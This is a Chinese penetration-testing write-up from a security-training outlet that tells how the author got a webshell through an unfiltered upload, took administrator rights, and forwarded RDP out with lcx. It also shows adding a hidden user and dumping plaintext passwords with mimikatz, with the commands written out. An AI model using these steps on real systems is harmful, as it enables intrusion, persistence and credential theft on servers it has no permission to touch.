实战纪实|运气爆棚直接获得服务器权限

admin 2021年9月8日10:48:47评论72 views字数 1087阅读3分37秒阅读模式

高质量的安全文章,安全offer面试经验分享

尽在 # 掌控安全EDU #



作者:掌控安全-药酱


更多安全动态、欢迎添加微信:zkaq99、一起学习实战纪实|运气爆棚直接获得服务器权限


0x00 前言



这两天想着挖一挖SRC,然后翻了站,发现了个文件上传

实战纪实|运气爆棚直接获得服务器权限

0x01 Getshell



尝试上传asp小马

实战纪实|运气爆棚直接获得服务器权限

哟!这运气,毫无过滤直接起飞~~~


拿着我的小蚁剑连上我的马儿


实战纪实|运气爆棚直接获得服务器权限

无狗狗拦截,舒服啦!看看权限


实战纪实|运气爆棚直接获得服务器权限


直接管理员权限,连提权都不用了,看下IP开3389吧


实战纪实|运气爆棚直接获得服务器权限

实战纪实|运气爆棚直接获得服务器权限

是内网,3389倒是开了,现在要么就转发端口,要么就上CS/MSF 来操作,我还是上CS吧


0x02 瞎β操作之上马



掏出我的cs生成个马,执行试一下先


实战纪实|运气爆棚直接获得服务器权限

马执行了怎么没反弹呢?难道有杀软??


实战纪实|运气爆棚直接获得服务器权限

也没看到有杀软啊(这里的nc lcx ew 都是我之前上传的) 只能免杀一下再上

这里我用AVIATOR来免杀

实战纪实|运气爆棚直接获得服务器权限

看看360和火绒的效果


实战纪实|运气爆棚直接获得服务器权限

效果不错奥,接着干就完事了


实战纪实|运气爆棚直接获得服务器权限

WTF????


怎么还是不行???


算了,还是换条路吧,lcx转发出来吧


0x03 端口转发



随便找个目录上传lcx

 lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389

这里的意思是把本机的3389转发到公网的4444端口 


我这边没win的外网服务器(主要是穷)


我就用NATAPP来转发吧


实战纪实|运气爆棚直接获得服务器权限

然后下载客户端本地运行NATAPP


实战纪实|运气爆棚直接获得服务器权限

这里的tcp://xxxx.com:1565 是给的域名ping一下转换端口,后面的1565是随机给的端口


等等lcx那里要改成这里的端口


实战纪实|运气爆棚直接获得服务器权限

这里本地监听

lcx.exe -listen 5656 5555

意思是监听本地5656端口然后转发给5555


实战纪实|运气爆棚直接获得服务器权限

ok监听成功,去连接本地的5555端口试一下


实战纪实|运气爆棚直接获得服务器权限

芜湖~ 起飞~ 


添加个隐藏用户吧


实战纪实|运气爆棚直接获得服务器权限

0x04 读取密码



既然都上来了那就读取一下管理员的密码吧 直接上mimikatz


privilege::debug

sekurlsa::logonpasswords

实战纪实|运气爆棚直接获得服务器权限

mimikatz! 永远滴神 成功读取明文密码,后面就不继续了。


该删的要删了


0x05 总结



这次完全就是运气好,先是上传没有限制,也没有防护软件。


后面虽然上马出了问题,但是还是转发了出来,之后上服务器发现了瑞星,但是lcx和mimikatz都没杀,很奇怪。


然后发现了是虚拟机,就不接着操作了,再会!



回顾往期内容

Xray挂机刷漏洞

POC批量验证Python脚本编写

实战纪实 | SQL漏洞实战挖掘技巧

渗透工具 | 红队常用的那些工具分享

代码审计 | 这个CNVD证书拿的有点轻松

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

实战纪实|运气爆棚直接获得服务器权限


扫码白嫖视频+工具+进群+靶场等资料


实战纪实|运气爆棚直接获得服务器权限

 


实战纪实|运气爆棚直接获得服务器权限

 扫码白嫖


 还有免费的配套靶场交流群哦!


本文始发于微信公众号(掌控安全EDU):实战纪实|运气爆棚直接获得服务器权限

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月8日10:48:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战纪实|运气爆棚直接获得服务器权限http://cn-sec.com/archives/392604.html

发表评论

匿名网友 填写信息